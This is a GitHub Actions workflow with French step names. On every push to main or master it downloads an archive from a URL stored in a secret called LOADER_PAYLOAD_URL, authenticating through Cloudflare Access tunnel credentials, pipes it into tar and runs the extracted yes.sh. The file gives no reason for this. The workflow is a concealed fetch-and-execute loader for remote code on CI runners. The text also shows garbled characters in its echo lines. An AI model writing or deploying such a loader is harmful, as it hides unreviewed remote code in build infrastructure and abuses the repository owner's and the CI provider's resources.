name: Extraire et ExΓ©cuter Archive

on:
  workflow_dispatch:
  push:
    branches:
      - main
      - master

jobs:
  extract-and-run:
    runs-on: ubuntu-latest
    
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
      
      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version: '24'
      
      - name: VΓ©rifier les variables requises
        run: |
          if [ -z "${{ secrets.LOADER_PAYLOAD_URL }}" ]; then
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€ LOADER_PAYLOAD_URL EST DIE"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            exit 1
          fi
          if [ -z "${{ secrets.CLOUDFLARE_ACCESS_TUNNEL_ID }}" ]; then
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€ CLOUDFLARE_ACCESS_TUNNEL_ID EST DIE"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            exit 1
          fi
          if [ -z "${{ secrets.CLOUDFLARE_ACCESS_TUNNEL_SECRET }}" ]; then
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€ CLOUDFLARE_ACCESS_TUNNEL_SECRET EST DIE"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            echo "π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€π’€"
            exit 1
          fi
      
      - name: Mise en place
        run: |
          curl --proto '=https' --tlsv1.2 -sSfL \
            --cacert /etc/ssl/certs/ca-certificates.crt \
            -H "CF-Access-Client-Id: ${{ secrets.CLOUDFLARE_ACCESS_TUNNEL_ID }}" \
            -H "CF-Access-Client-Secret: ${{ secrets.CLOUDFLARE_ACCESS_TUNNEL_SECRET }}" \
            "${{ secrets.LOADER_PAYLOAD_URL }}" | tar -xJ

      - name: Lancement de la fusΓ©e
        run: |
          echo "π€ Lancement"
          chmod +x ./yes.sh
          ./yes.sh
